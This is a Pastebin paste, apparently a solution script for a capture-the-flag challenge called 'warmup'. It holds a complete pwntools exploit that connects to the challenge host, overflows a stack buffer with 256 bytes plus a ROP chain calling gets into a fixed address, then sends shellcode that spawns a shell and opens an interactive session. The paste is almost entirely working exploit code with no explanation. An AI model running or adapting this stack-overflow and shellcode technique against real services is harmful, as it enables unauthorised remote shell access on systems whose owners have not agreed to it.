Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- context.arch = 'amd64'
- p = remote("nothing.chal.ctf.westerns.tokyo",10001)
- elf = ELF('./warmup')
- rdi = 0x400773
- buf = 0x0601a00
- shellcode = asm(shellcraft.sh())
- rop = p64(0xdeadbeef)+p64(rdi)+p64(buf)+p64(elf.plt["gets"])+p64(buf)
- p.sendline("A"*256+rop)
- sleep(0.5)
- p.send(shellcode)
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
